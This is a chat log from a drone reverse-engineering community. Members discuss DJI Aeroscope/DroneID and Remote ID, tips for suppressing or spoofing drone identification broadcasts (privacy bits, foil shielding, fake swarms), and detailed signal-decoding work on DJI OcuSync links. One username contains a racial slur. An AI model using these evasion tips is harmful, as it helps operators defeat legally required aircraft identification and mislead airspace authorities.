anyway, it sounds like RID is too unreliable and flawed to be of any real concern for pilots that want to stay safe from salty cops trying to find an excuse for executing their authority (even if strictly speaking legally right). But I still couldn't find any info on a successor to Aeroscope. Only that because RID is coming, DJI decided to cancel Aeroscope so they could follow suit with the new, unified tracking standard
[2023-06-30 16:55:54]
remotelyidentified :
remotelyidentified joined the channel.
[2023-06-30 17:14:05]
remotelyidentified :
Airspace is a property of the commons, and needing some kind of identification to use these properties is fairly well established worldwide. License plates are the obvious and perfect analogy: in exchange for getting to use the road, you give up a little bit of your freedom and privacy. I find it funny that those who are most opposed to ID tech are those who could benefit from it the most - in countries which have banned drone use due to fear, Remote ID is a great tool for calming the mind of lawmakers and allowing more freedom to fly. It literally gives people the ability to distinguish those flying in their garden from those terrorizing a sporting event.
As for the technical implementation of Remote ID: It has obvious flaws, but once you start thinking about them, how could they be fixed? If messages are to be authenticated or encrypted, you have the classic "how do you give key material to random global vendors and have it not leak in 5 minutes" problem. Nobody has solved this problem - if you look at Windows driver signing keys, CarPlay / Android Auto, Made for iPhone, etc, it's all broken. And if you start thinking about encrypting the data, things get even worse. Now you have a centralized enforced monopoly on drone detection / airspace management held by whoever manages the trust root and issues keys.
I actually think that Remote ID is probably the best solution we could have gotten as far as the possibilities go. It's basically like a flying license plate: it's relatively short-ranged, it's a public ID which only registration authorities can link to a private identity, it's easy for anyone to inspect and understand exactly what's being sent. It's massively prone to spoofing, but any anti-spoofing solution I can think of is both technically implausible and ultimately worse as it would build false trust in the system (see, again, driver signing for a great analogy here... when the keys leak it's a disaster). Yes, Remote ID could be turned into a panopticon pattern of life monitoring system if drones were your pattern of life, I suppose, but certainly no worse than a license plate. I agree that dragnet data-aggregation services should probably be limited (see Flock in the US for example... gross...), but that's sort of an orthogonal problem created by technology - someone with a massive collection of RF sensors could also just track your phone and gain much more useful information about you as a person than a drone.
What we got seems pretty reasonable to me, and 1000x better than the Mainland China solution and the first Remote ID draft, with always-on mandatory Internet based flight reporting to a central government agency.
[2023-06-30 18:41:52]
tstotch :
the short range is something I'm happy about too, even if it means that some cranky old fart will be able to spot and report you having fun by yourself far away from populated areas without disturbing anybody. It's better than Aeroscope's 48(?)km range scanners where you can get spotted and reported for endangering the airport's traffic while you are 40km away from the airport using your Mini 3 to knock old soup cans off a table in your garden...
[2023-06-30 19:12:29]
quad808 :
To me, the issue is simple. Digital license plate? Fine. No problem, as LONG AS only law enforcement can get the info if they are authorized to enforce regulations. Citizens should not be able to track you down after being able to see...where your drone is, where it took off from etc. That's just asking for trouble for a host of scenarios.
[2023-06-30 20:15:34]
tstotch :
completely agree on that. And even law enforcement should only be allowed to intervene if there is legitimate and immediate concern for danger. Such as you flying over a school, a hospital, police station or similar. Due to RID being short range, this would easily be visible with the naked eye too
[2023-06-30 20:17:30]
tstotch :
but civilians should never, under any circumstances, have access to any kind of data your drone transmits. Regardless which it is. It's simply none of their business what you do with an item that you own yourself. Something nobody but yourself has their hands over
[2023-06-30 20:19:41]
tstotch :
but enforcing the law becomes a huge mess when you are in a country like Germany, where you have two or three different sets of airspace laws entangled with each other. Plus cities being able to designate their own restrictions separate from that
[2023-06-30 20:21:02]
tstotch :
So even if your flying is totally fine and legal according to EU law, it can still be illegal according to whatever local law your country, state or city has. Even if EU law should technically stand above those
[2023-07-01 12:05:17]
jcase :
You all do realize that remote id/ drone id isn't needed to get pretty much the same information right?
[2023-07-01 12:05:27]
jcase :
at least much of it
[2023-07-06 11:40:32]
vagr4nt :
vagr4nt joined the channel.
[2023-07-06 15:57:07]
sp4rk :
sp4rk joined the channel.
[2023-07-06 17:32:41]
joonas :
yeah apologies, i was clearly mistaken on the actual origins of JD. the readme update is probably good anyway. normies google "disable drone id", one thing leads to another... arguments ensue.
[2023-07-06 18:00:51]
tstotch :
yeah, same happened to me and videos about that script explaining how it "disables" DID when it in reality does not don't help either. But with AS being discontinued and RID apparently so easy to mess with, JD isn't needed anymore either really
[2023-07-06 18:03:02]
tstotch :
I literally googled "how to disable droneid" and that led me to a video which then pointed towards jeep
[2023-07-06 18:07:46]
tstotch :
First thing I asked when getting in touch with one of the devs some months ago was actually if there's any risk of failure from the script or that the signal might otherwise get through even with the script active but I was redirected here instead
[2023-07-07 00:16:59]
funbob :
funbob joined the channel.
[2023-07-07 20:09:46]
heathcliff :
heathcliff joined the channel.
[2023-07-09 03:05:11]
tstotch :
https://www.youtube.com/watch?v=Q8jn_6EmYxE JB providing instructions on how to mess with RID
[2023-07-09 12:48:17]
bitbangingbytes :
Attach that to your drone and you're instantly a swarm?
[2023-07-09 15:50:35]
tstotch :
yep. To be honest, that's one reason I'm doubting the usability of this. If you open your tracking app and you see a condensed spot of many drones in the middle of nowhere, you can easily tell it's a spoofer there
[2023-07-09 15:51:09]
tstotch :
So instead of hiding it in a swarm of drones, it would probably be better to just obfuscate the transmitted data, if possible
[2023-07-09 15:51:47]
tstotch :
or force it to transmit false data. Like the drone sitting on the ground a couple kilometers away
[2023-07-09 16:31:56]
bitbangingbytes :
Yea, spoof hovering around a busy park nearby or something that's hard to track down who it might be
[2023-07-14 02:41:18]
joelg :
Does anyone have the ipa for maven
[2023-07-14 14:31:11]
oakley75 :
Even much older models have the hardware capabilities to transmit.
https://forum.dji.com/forum.php?mod=viewthread&tid=293343&extra=page%3D1%26filter%3Dtypeid%26typeid%3D815%26typeid%3D815
[2023-07-16 10:06:13]
ct253 :
ct253 joined the channel.
[2023-07-17 10:24:24]
rachfly :
what is the story with skydio?? do they work on a new drone? why can't you buy any of the drones? anyone has any information?
10x
[2023-07-17 11:14:03]
jcase :
I have some of their drones
[2023-07-17 11:14:22]
jcase :
i know a little about the internal workings of them but none of the company outside what info i got when i interviewed with them
[2023-07-17 11:29:19]
joelg :
Don’t know anything about apps but was looking through the dji fly app with the jailbreak tweak flex and looking for anything remote Id related
[2023-07-17 11:29:44]
joelg :
[2023-07-17 11:30:15]
joelg :
Trying to stop the app from resetting privacy bits
[2023-07-17 11:31:06]
joelg :
Gonna set everything to false see what happens
[2023-07-17 12:13:20]
konraditurbe :
There's a rumor floating around, spread by former DJI VP of Policy no less, that Skydio is out of the consumer/mass market.
[2023-07-20 22:39:47]
karthor :
karthor joined the channel.
[2023-07-24 02:44:49]
dji-rev.concierge132 :
dji-rev.concierge132 joined the channel.
[2023-07-24 19:27:42]
joelg :
If maven for iOS doesn’t reset privacy bits I’m guessing it’s because they used an older sdk doesn’t that mean that there should be an older version of litchi iOS that also doesn’t reset privacy bits?
[2023-07-24 21:56:08]
dji-rev.concierge132 :
@joelg dang good thing you mentioned it. I was using litchi thinking my aeroscope was disabled! the dang SDK re-enabled it.
[2023-07-25 10:37:59]
jcase :
changing privacy bits does not disable aeroscope.
[2023-07-25 12:45:38]
dji-rev.concierge132 :
well I mean it sends out 000s instead of actual information. I am ok with it transmitting if it's all zeros.
[2023-07-25 12:48:15]
konraditurbe :
Not always and only verifiably observed this behavior on specific firmware versions, on specific app versions and on specific birds.
[2023-07-25 12:49:45]
dji-rev.concierge132 :
well I am using very old firmware on my mini 2 and old version of DJI fly. the one recommended by the jeepdoors
[2023-07-25 12:50:47]
dji-rev.concierge132 :
01.03.0601
[2023-07-25 13:49:39]
dji-rev.concierge132 :
is there a cheap way to confirm what my drone is sending out to the world ? @konraditurbe
[2023-07-25 13:50:00]
konraditurbe :
No...
[2023-07-25 13:50:13]
dji-rev.concierge132 :
or should I just return it back to the store and forget about DJI. not gonna lie this aeroscope crap is a mood breaker
[2023-07-25 13:57:47]
joonas :
with both US and EU regulations coming in hard and fast you won't be able to purchase an off the shelf drone w/o RID at all soon. this is not just unique to DJI (although yes, they were ahead of the curve with aeroscope and yes they're CCP aligned. but that's besides the point).
[2023-07-25 14:03:46]
dji-rev.concierge132 :
@joonas Is there anything on the market right now that is comparable to DJI mini 2 without all of this crap built-in or at least inactive at the moment? I am from Canada so I am from neither the US nor the EU.
[2023-07-25 14:08:03]
joonas :
something from autel probably? i couldn't say for sure, especially on the comparable to dji mini 2 front. that's sort of like asking for a macbook but not wanting it to be from apple...
[2023-07-25 14:08:37]
joonas :
you can probably get something with similar specs, but the experience is not going to be nearly as polished, that's for sure.
[2023-07-25 14:10:08]
joonas :
official US RID (wifi) packets you can actually pick up with an android/ios app presuming a new enough phone. but for dji's aeroscope "droneid" (their old method) you need an expensive sdr and lots of grunt work with processing scripts i'm afraid. or access to an aeroscope.
[2023-07-25 14:10:41]
dji-rev.concierge132 :
Do those drones have a hacking community similar to DJI? @joonas. Also doesn't have to be necessarily like mini 2, but must be less than 250g and similar range. ~1k budget
[2023-07-25 14:10:59]
joonas :
i don't actually know for sure how droneid/remoteid behaves when the region is set to canada. it should have the wifi based RID off, but it might be broadcasting old aeroscope droneid signals then.
[2023-07-25 14:11:55]
dji-rev.concierge132 :
The droneid/remoteid app wasn't picking up anything in my area.
[2023-07-25 14:12:04]
joonas :
hacking community around autel - afaik no.
[2023-07-25 14:12:09]
dji-rev.concierge132 :
gonna test with my own drone soon
[2023-07-25 14:12:33]
dji-rev.concierge132 :
that's a deal breaker.
[2023-07-25 14:12:52]
joonas :
yeah thing is it's likely turned off based on your region. but that doesn't tell us if the proprietary aeroscope method is off or on.
[2023-07-25 14:13:00]
dji-rev.concierge132 :
not that I even want to remove limits. I just want to own the stuff I bought and so it doesn't spy on me
[2023-07-25 14:39:43]
konraditurbe :
We will all go back to building our own quads with old FCs and whatnot soon or kiss this hobby goodbye.
[2023-07-25 14:47:24]
joonas :
yeeees, come over to the FPV dark side ;)
[2023-07-25 15:40:21]
dji-rev.concierge132 :
speaking of own quads. does DJI fpv camera module also have aeroscope crap in it ?
[2023-07-25 15:41:37]
dji-rev.concierge132 :
I really like the DJI video stream quality.
[2023-07-25 15:55:22]
dkovar :
Almost all drones in the U.S. will be required to broadcast information that you perceive as "spying on you". If you want quality products built by someone else, you'll need to accept RID. (Or disable it, which is illegal, but that is on you, I do not care.)
So, if you want DJI video quality, you need to accept RID and "Aeroscope crap".
[2023-07-25 16:18:50]
dji-rev.concierge132 :
I am not from US though
[2023-07-25 16:19:24]
dji-rev.concierge132 :
until they introduce it here, I am sure it's a matter of time, I am not required to have a spying stuff on my drone
[2023-07-25 16:21:39]
dji-rev.concierge132 :
also from what I understand sub 250g drones are not required to have remoteid in US
[2023-07-25 16:27:15]
dkovar :
Correct. You are also not required to buy DJI.
What is required for RID in the U.S. does not apply to you. The 250g exception is due to the fact that a) drones under 250g do not need to be registered and b) drones that do not need to be registered do not need RID.
The question is - will DJI products that support RID that are sold in Canada have RID disabled?
[2023-07-25 17:15:18]
joonas :
they don't. neither the old air unit / vista series nor the new o3 air unit. this has been confirmed multiple ways, including an aeroscope.
[2023-07-25 17:18:25]
joonas :
and it's important to note here that i don't expect them to ever add RID to the DIY systems. why? because there's no way to get such a system, which relies on an external fc providing gps coordinates, to be a compliant system. they need to be in control of the whole gps to broadcast chain, otherwise they can't submit it for compliance.
[2023-07-25 17:44:39]
dji-rev.concierge132 :
I've seen external modules being sold for RID. some replace GPS module so you can save weight and others are just stand alone modules that you can attach to your existing drones
[2023-07-25 17:47:32]
dji-rev.concierge132 :
That's good! I wanna build my own FPV drone with this module in it. The only part I don't like is having to always use goggles for it. Wish there was a receiver that just plugs into phone or tablet that appears as an otg webcam.
[2023-07-25 18:06:32]
quad808 :
So, technically.....you build a quad, then wrap the remote ID broadcast unit in foil. It's still working, you are still legal, but hey...no one can pick up the transmission due to extremely limited broadcast range. Oopsie. But hey, I am not a lawyer, nor do I work for the FAA. My bet? DJI, unless specific country laws prohibit RID, will take the easy way out and enable it on all their drones, but we will see. We are already seeing it turned on in other countries besides the USA and Japan, even though there is no country requirement that they do so. Let's see how this shakes out.
[2023-07-25 18:17:09]
dji-rev.concierge132 :
I am sure they will close all loopholes once people start abusing stuff like this. Also, I think it's currently not illegal to spoof fake RID to make it harder to detect the real drone among the cloud of fake ones. @quad808
[2023-07-25 20:14:57]
dkovar :
It is illegal to spoof RID. I asked some qualified people about this and received some solid information showing how it is (likely) illegal. I need to go find it.
But the two points that stick are:
1) FCC violation, operating an illegal transmitter
2) Interfering with manned aircraft in flight
The specific citations exist, I just need to find them..
[2023-07-25 22:31:20]
dji-rev.concierge132 :
What makes a transmitter illegal though? You can have 5-10 drone modules attached to the pigeon that is crapping on your backyard and that would be legal. Second one maybe if they can make a claim that they had to ground aircraft because of the fake swarm.
[2023-07-25 23:58:20]
oakley75 :
"...wrap the remote ID broadcast unit in foil"
[2023-07-25 23:58:41]
oakley75 :
Yep this. Even Ken Heron touched on it lol
[2023-07-26 00:00:12]
oakley75 :
It's a heat shield ha, play dumb
[2023-07-26 02:31:13]
bitbangingbytes :
Logic won't matter when you're explaining it to a jury of "your peers" and by "your peers" I mean people that understand nothing about technology and will be easily swayed by a lawyer, the more expensive lawyer.
[2023-07-26 06:48:19]
juvatos :
juvatos joined the channel.
[2023-07-26 09:01:06]
joonas :
idk man. the spirit of the law is that your drone must be broadcasting its (and your) coords, not that it needs to have a rid module on it.
[2023-07-26 09:01:50]
joonas :
ofc you can argue loopholes and disagree with the law (i think as implemented it's shit too), but seems like a bit of a playing dumb argument to me.
[2023-07-26 13:19:05]
jcase :
This would only be legal in certain circumstances in the US, and for the average consumer it would not be. It would be limited to DOD, and potentially law enforcement.
[2023-07-26 22:20:52]
tissy :
Looks like Aeroscope will detect the new Air 3 ```"90":"DJI Air 3"``` which is good news.
[2023-07-27 15:00:16]
jcase :
is this inferring the ID is 0x90 or decimal 90?
[2023-07-27 15:02:31]
jcase :
or does anyone know which app Air 3 uses? I could unpack and look, assuming it is using the DJI Pilot TWO? or perhaps they dropped a new fly?
[2023-07-27 15:42:51]
konraditurbe :
DJI Fly newer version
[2023-07-27 16:41:59]
tissy :
0x90 @jcase
[2023-07-27 16:42:31]
jcase :
thank you
[2023-07-28 07:40:02]
dreamtree :
dreamtree joined the channel.
[2023-07-28 08:10:56]
mobimore :
mobimore joined the channel.
[2023-07-31 14:30:07]
bignigger :
bignigger joined the channel.
[2023-08-01 15:27:40]
sachinkew :
sachinkew joined the channel.
[2023-08-01 17:35:28]
sachinkew :
Please help me with disabling droneid from mavic 3t
[2023-08-02 22:54:57]
razorfish :
razorfish joined the channel.
[2023-08-09 17:13:31]
negual :
negual joined the channel.
[2023-08-10 14:37:24]
lapse98 :
Who is left for AS providers in the US? Knowing supply is limited.
[2023-08-10 15:05:48]
dkovar :
Dedrone, though it would be part of their larger offering. 911 Security, which is rebranding to AirSight. FlyMotion.
Gresco sold to Aerial Armor. DeDrone bought Aerial Armor.
[2023-08-12 22:09:32]
deonisray :
deonisray joined the channel.
[2023-08-15 09:49:07]
mainframe :
we have #evo channel here and at least Evo2 series can be easily rooted. Just this info is not widely published. You need to ask :)
[2023-08-15 15:58:19]
mstone :
mstone joined the channel.
[2023-08-15 17:55:11]
mstone :
Air 2S: used CIA, showed disabled.
Started with N1 and iOS, Litchi: back enabled.
[2023-08-15 17:55:27]
mstone :
is the android app the only way?
[2023-08-16 03:17:20]
dji-rev.concierge132 :
newer SDK and Dji app re-enable it. Litchi uses newer SDK. You might be able to use old Litchi version that uses older SDK or just go back to old version of the DJI app.
[2023-08-16 18:50:01]
mstone :
bummer
[2023-08-18 07:03:55]
whatisinmydrone :
whatisinmydrone joined the channel.
[2023-08-18 07:34:45]
whatisinmydrone :
Anyone tested if its possible to disable/fake the droneID gps location on the matrice 30t?
[2023-08-24 18:56:20]
bengutt :
bengutt joined the channel.
[2023-08-28 03:46:54]
mako918 :
mako918 joined the channel.
[2023-08-29 23:22:07]
enk2022 :
anyone knows if AeroScope can detect Mavic 3 Pro or Inspire 3?
[2023-08-30 02:03:47]
jeremybearimy20 :
jeremybearimy20 joined the channel.
[2023-08-30 11:09:43]
jcase :
mavic 3 pro for sure, idk why it wouldn't detect an inspire 3, DJI hasn't rolled out the new droneid variant as far as i know
[2023-08-30 11:55:21]
tissy :
Inspire 3 is within the definition type table (type 76), so as @jcase states, no reason it should not be detected but haven't physically confirmed.
[2023-08-31 14:09:12]
theufodroner :
Where can you find the full table?
[2023-08-31 17:35:15]
the_lord :
Aeroscope detects the Inspire 3, Air 3 and M350
[2023-08-31 17:36:03]
the_lord :
it detected all latest drones
[2023-08-31 19:10:40]
convair :
convair joined the channel.
[2023-09-04 01:29:52]
enk2022 :
:+1:
[2023-09-04 01:30:00]
enk2022 :
thank you
[2023-09-04 18:50:53]
vcka :
vcka joined the channel.
[2023-09-08 16:56:50]
dong :
dong joined the channel.
[2023-09-08 19:57:06]
aholtzma :
anyone have any Ocusync3/LB1/LB2 spectrum recordings they'd like to share?
[2023-09-10 20:48:38]
masskiller :
masskiller joined the channel.
[2023-09-11 15:23:37]
woland :
woland joined the channel.
[2023-09-13 10:14:08]
molda :
molda joined the channel.
[2023-09-19 14:22:20]
leperdu :
leperdu joined the channel.
[2023-10-03 19:18:54]
lapse98 :
Anyone know what model starts with F6Z9?
[2023-10-03 22:37:27]
the_lord :
Mini 4
[2023-10-04 01:15:29]
lapse98 :
Thank you
[2023-10-10 07:41:33]
ginostred :
Hi, does anyone know if the Air 3 and Mini 4 pro transmit droneid and therefore are detectable by aeroscope? Or they only use the new Remote ID for identification?
[2023-10-10 13:04:44]
tissy :
Both platforms are detectable by Aeroscope.
[2023-10-15 20:49:30]
dumldore_newbi :
dumldore_newbi joined the channel.
[2023-10-19 01:24:01]
shuke :
Does anyone know how to modify the ascent/descent and forward speed on the DJI mini2? Adjusting dh doesn't seem to work. Looking for a tutorial.
[2023-10-19 14:58:16]
w3c :
w3c joined the channel.
[2023-10-20 11:57:47]
jdan7387 :
jdan7387 joined the channel.
[2023-10-21 06:55:07]
shuke :
Can anyone share which values the Mini 2 parameters correspond to?
[2023-10-21 12:46:08]
baxove :
Hi, I fly my Mini 2 with airplane mode on all the time, and I have disabled the privacy bits with CJD to improve privacy as much as I can. Is there any point in also enabling Local Data Mode in the DJI Fly app if the phone is always in airplane mode? And does disabling the other privacy settings like "Mobile Device GPS Info" and "DJI Device GPS Info" improve privacy in my case?
[2023-10-21 18:14:51]
oakley75 :
It is redundant yes since the app has no internet access. That being said, I always disable everything anyway and use local data mode. I guess there's a risk of unintentional connection if you have a saved SSID, and disabling everything would limit somewhat what the app is collecting/logging. But I'm sure you know already not to ever store a WIFI password. I run a firewall as well. Not necessary, sure, but I can sleep soundly at night with this setup. Also only use Fly 1.5.10 to preserve CJD.
[2023-10-22 01:58:18]
adyo-dji :
adyo-dji joined the channel.
[2023-10-22 07:01:24]
baxove :
Thanks for your answer. Yes, the phone I am using is never connected to the internet, and there are no saved SSIDs. The Fly version is 1.5.10. I guess I will disable Local Data Mode if it's redundant so I can see which direction the RC is in the compass view.
[2023-10-24 17:33:57]
caseygibson :
caseygibson joined the channel.
[2023-10-27 19:04:44]
mgracio :
mgracio joined the channel.
[2023-10-29 10:57:00]
alex7593 :
alex7593 joined the channel.
[2023-11-02 13:26:14]
dhsacxz :
dhsacxz joined the channel.
[2023-11-07 16:59:54]
dumldore_newbi :
Do i understand the following right:
1) DroneID = RemoteID
2) remoteID = (Network Remote ID, Broadcast Remote ID)
[2023-11-08 09:39:48]
tom87 :
tom87 joined the channel.
[2023-11-08 15:40:04]
dkovar :
DroneID = DJI's capability to broadcast information about their UAV's location and the operator's location to their own "sensors", Aeroscopes.
RemoteID = The U.S. FAA's "digital license plate" for UAVs. Not networked, just broadcast via Bluetooth.
[2023-11-10 14:15:03]
alex7593 :
https://github.com/proto17/dji_droneid
[2023-11-13 09:21:57]
dumldore_newbi :
Thank you
[2023-11-20 09:21:19]
asuka_331 :
asuka_331 joined the channel.
[2023-11-24 08:06:35]
s1m0n :
s1m0n joined the channel.
[2023-11-24 14:51:35]
wr2475973835 :
wr2475973835 joined the channel.
[2023-11-25 19:53:51]
tom87 :
I'm trying to adapt the script for decoding DroneID to work with the other Ocusync data. The packets seem to be fine so far, but I'm not sure if the scramble code is the same. Can anybody help me with that?
[2023-11-27 13:06:36]
tmbinc :
The scramble code is not 0x12345678 like in the DroneID-packets, but also the ZC sequences are different.
[2023-11-27 13:08:14]
tmbinc :
It's all derived from a "seed", i.e. the hopping pattern, the scrambling and the usage of ZC sequences all derive from the same thing. I'm unsure how the actual encryption (AES) key is also derived from this or not.
How far did you get with demodulation of the signal? Can you synchronize well to timing and frequency, i.e. do you get a clear constellation?
[2023-11-28 04:22:03]
enigma2 :
all @tmbinc comments are GOLD .
[2023-11-30 04:41:56]
eseven :
In the last few weeks DJI has deployed a new firmware (and gadget for standalone devices) to upgrade Aeroscopes. I'm inspecting the firmware and I cannot see specific differences at least at the main board and wifi part. Seems that the only part evolved is the Occusync part, but I need more time (and help) to evaluate it.
Does anyone know why DJI is deploying this new firmware?
[2023-11-30 22:01:03]
jcase :
yes, it's to allow decryption of the new droneid standard, that is encrypted
[2023-11-30 22:01:37]
jcase :
which is stupid, as that done is not needed, they are doing it to hide the decryption key
[2023-11-30 23:49:07]
nmikus :
Did they push this out to the drones or just the AS units?
[2023-11-30 23:53:49]
hito_no_yume :
I have done a bit of work on this quite a while ago. Try mini 2 downlink, and look at the first symbol. You might find a golden sequence there if your demodulation is right :wink: Hint: how can you determine if a given sequence is golden sequence?
[2023-12-01 11:14:19]
eseven :
Have you seen if encryption applies to all three protocols? I've seen weird validation flows at the wifi part, covering also the actual one. I suppose that decryption is done at the main board part, to not use "models" extra CPU.
[2023-12-01 14:16:53]
jcase :
should be both
[2023-12-01 14:24:43]
tom87 :
I look at the very first package too. What do you mean with, I can find a gold sequence there? I decode all data, 6 packages with 6 symbols (between the zc symbols). Do you have one more hint? Please?
[2023-12-02 06:22:54]
nmikus :
I see 2 new AS pkt types but don't see where they decrypt them
[2023-12-03 23:51:53]
hito_no_yume :
Focus on the first symbol after the first zc symbol. Rest of the packet would make this more complicated, just ignore them for now. Play with this script to understand how golden sequence generation works: https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/generate_scrambler_seq.m
Basically it takes x2_init value as a parameter and generates a sequence. If you look at enough bursts for Mini 2, you will see a golden sequence in the first symbol after first zc, but it uses a different init than the one used in DroneID.
[2023-12-03 23:55:13]
hito_no_yume :
Actually, one more thing came to my mind I forgot to mention. There are some additional data in the first two symbols which you need to remove. I call them pilots, but don't really know what they are. DroneID doesn't have these I think. Another hint for you for these additional bits/symbols in the packet. Just turn on the drone without turning on the controller, and work on this part of the communication. For many bursts, bits should be almost identical except these pilots.
[2023-12-04 05:46:54]
tmbinc :
Oh, I didn't know! So some actual subcarriers need to be removed?
That may explain my issue why I was able - for non-drone-id - to find a good goldcode match for symbols 2+, but not for the first two.
[2023-12-04 08:58:54]
hito_no_yume :
Yes indeed, you need to remove those subcarriers from the first two symbols. I don't know if they carry any meaningful data, I couldn't see one. Easiest way to find locations of those subcarriers is to use drone only on transmission.
[2023-12-04 17:32:42]
tmbinc :
4 out of every 20 bits? Does that sound about right?
[2023-12-04 17:53:12]
tmbinc :
So with that, I get 2400 - 2400/20*4 = 1920 header bits, that seem to have 78 bits of information that is repeated. Then, the gold-code restarts.
[2023-12-04 23:54:02]
hito_no_yume :
That sounds about right. Golden sequence you found will be the same after controller turns on and demodulation is still the same, just more turbo block sizes. That part of the communication is handshaking for exchanging encryption key, eventually when the controller is on, encryption will start and the packets will look much different other than the header parts
[2023-12-04 23:54:40]
hito_no_yume :
I am getting interested in this again :smile: maybe I should go back to trying to decrypt it again
[2023-12-04 23:57:08]
tmbinc :
I'm working on a capture that was made directly after the RC was turned on, where they eventually sync.
Any hints on how to decode the 78 bits? I would naively think that if data is repeated after 78 bits, that would be the 3 turbo buffers of n*8+4 bits each, but 78 % (3 * 8) != 12.
(Unlike Droneid, where 4236 % (3 * 8) = 12)
[2023-12-04 23:57:19]
tmbinc :
Is everything turbo encoded?
[2023-12-05 00:08:28]
hito_no_yume :
I couldn't get to decode that part I think. My suspicion was that it is convolution encoded. 78 / 3 = 26 bits which is a possibility for conv. encoder.
[2023-12-05 00:24:05]
tmbinc :
Ah ok. But the remainder of the packet, i.e. everything after bit 2400, is Turbo encoded?
E.g. in my first packet bits repeat every 348. Hence I would think it's a 14-byte packet, turbo-encoded.
How do I find the right offset for the systematic buffer? For DroneID I guessed a lot... but it helped that there was a valid CRC.
[2023-12-05 00:32:56]
hito_no_yume :
Your assumptions sound correct to me. Rest of the decoding is very similar to Drone ID. You just need to use the right turbo block size and the rest should just work, rate match turbo decode CRC etc.
[2023-12-05 00:37:04]
hito_no_yume :
I am not sure what you are referring to with systematic buffer though. I don't quite know the internal implementation of turbo decoder, but same stuff from drone ID should work with some size changes
[2023-12-05 00:41:40]
tmbinc :
"systematic buffer" - just the one of the 3 turbo buffers that contains the data itself, not the parity. (I don't decode parity right now so I just extract the data)
[2023-12-05 00:44:46]
hito_no_yume :
Wow, that is very impressive and much more complicated than it needs to be :smile: Maybe just give this tool a try with right sizes and then you should be able to CRC check:
https://github.com/proto17/dji_droneid/blob/main/cpp/remove_turbo.cc
[2023-12-05 00:45:14]
tmbinc :
E.g. my first packet contains the following 348 bits repeated:
```
000000100100000001000000000000000000001000100000001000000000000000000000000000010000001001000100000010000000100001101000000010000010100010100100100001000010001010100100101110001001101000000000011000111010100110100000100000000010111010100110000010001001001001000000011000000010000000100011000010001001001100010011000100010000000101001101010100010000
```
I don't know the offset, but if I try to turbo-decode with any of the 348 offsets (block size always 116 bit), I don't see anything with a valid CRC.
Is it the same crc16 as the droneid, or the crc8?
[2023-12-05 00:45:50]
tmbinc :
ooh, I never checked the actual crc24 I think
[2023-12-05 00:45:54]
tmbinc :
ok let me try this
[2023-12-05 00:51:05]
tmbinc :
That worked! \o/
```
341 0000000000000000000008a1813970
```
(i.e. at offset 341)
[2023-12-05 00:56:08]
hito_no_yume :
Nice! It does look like what I would expect from that part of the communication.
[2023-12-05 01:09:45]
tmbinc :
And then of course bit-reverse every byte
[2023-12-05 01:09:51]
tmbinc :
and then it's RRC packets :))
[2023-12-05 02:16:16]
hito_no_yume :
I actually didn't know they are RRC, learned something new today, thanks for that :smile: I was just assuming these packets were just a dji thing, never thought they would be part of LTE
[2023-12-05 09:03:37]
tmbinc :
Oh, it's .. DJI RRC. They just like to call them LTE-ish terms.
[2023-12-05 12:29:29]
stjian :
stjian joined the channel.
[2023-12-05 20:18:17]
mike.t :
mike.t joined the channel.
[2023-12-06 13:14:34]
dumldore_newbi :
where did you got the informations about the new firmware? Is it only based on your research? Can't find any public "official" information about the "new" droneID
[2023-12-06 16:50:50]
aholtzma :
Is it something they cooked up entirely, or RLC/ASN.1?
[2023-12-06 23:05:19]
tmbinc :
Entirely cooked up
[2023-12-07 12:05:32]
nopexecutor :
hm, haven't looked at Ocusync for quite a while... last I was able to do was to decode and decrypt DL, e.g. with video feed from OcuSync 2; I saw now there is 3 and 4, right? Anybody investigated those, or the UL signals?
[2023-12-08 01:56:03]
hito_no_yume :
There you are :smile: Thanks to your hints. I managed to decode the ocusync downlink, I couldn't get to decrypt yet, but now the Christmas break is coming, I will go back to decrypting it. I might start bothering you again :smile:
[2023-12-09 01:53:40]
qq134520 :
qq134520 joined the channel.
[2023-12-14 11:30:23]
dkovar :
I'm looking for an open source Remote ID -receiver- (not DroneID, not a transmitter) that runs on COTS hardware such as an ESP32 (e.g. LilyGo T-Beam).
The Android apps are unreliable and the commercial units are far too expensive.
[2023-12-14 13:21:11]
tissy :
Did the code I sent you not work @dkovar ? We don't have DJI remote ID in the UK, but certainly picks up the BT / WiFi RemoteID.
[2023-12-14 14:56:00]
lapse98 :
One of four listed at GitHub
https://github.com/PeterJBurke/RID
[2023-12-16 10:32:39]
nonefx :
nonefx joined the channel.
[2023-12-18 00:51:55]
notdan :
notdan joined the channel.
[2023-12-18 16:02:16]
quad_fan :
Again, @dkovar, Remote ID is not guaranteed to be broadcast via Bluetooth. Spec outlines more than just BT.
[2023-12-18 16:57:46]
dkovar :
Could you elaborate on this? What do you mean by "not guaranteed to be broadcast via Bluetooth?"
I know of no vendors of UAVs or RID transmitters that are using anything other than Bluetooth.
[2023-12-19 04:28:00]
eseven :
@dkovar There are different vendors that transmit WiFi. DJI, Parrot and Autel do.
[2023-12-19 04:30:38]
eseven :
And not all of them transmit using "standard" channels (6, ...) but still comply with the standard. The standard says to transmit at a faster pace if non-standard channels are used.... ;)
[2023-12-19 15:14:17]
dkovar :
Yes, but they are -all- transmitting Bluetooth.
[2023-12-21 06:58:11]
eseven :
@jcase decrypt applies at modemarm code?
[2023-12-21 12:32:21]
moyivo8659 :
moyivo8659 joined the channel.
[2023-12-22 11:42:19]
sparkyws :
Is this code available? i would like to try it @tissy
[2023-12-23 05:41:20]
mehr :
mehr joined the channel.
[2023-12-27 21:18:34]
dji-noob :
dji-noob joined the channel.
[2023-12-28 00:33:55]
hostile :
For those that are not aware... Bambu 3D printers (made by former DJI employees) are about to get their first public firmware drop from a 3rd party. https://www.youtube.com/watch?v=XcfYgCXaANA
[2024-01-03 20:22:40]
tom87 :
@hito_no_yume , I have to bother you again. I captured the first package from the drone ten times after reboot, without RC. And all 600 subcarriers are identical. I am focused on the first symbol directly after my first ZC (403). Is there any other way to find the sub carriers which should remove before getting the gold sequence?
[2024-01-04 10:53:04]
herespam :
herespam joined the channel.
[2024-01-07 13:04:54]
dumldore_newbi :
Decode DroneID directly on a SDR: https://www.youtube.com/watch?v=OcaRNos_Hj0
[2024-01-09 16:24:13]
tom87 :
gold
[2024-01-11 07:55:52]
dubliss76 :
dubliss76 joined the channel.
[2024-01-12 19:16:46]
jcase :
Hiring. Come work with some of the best cellular, embedded, UAS and CUAS hackers the world has to offer. Remote, well established company. Not a flaky startup. US based preferred. Multiple positions available.
Reverse Engineers, Exploit developers, App developers, embedded engineers, rf engineers
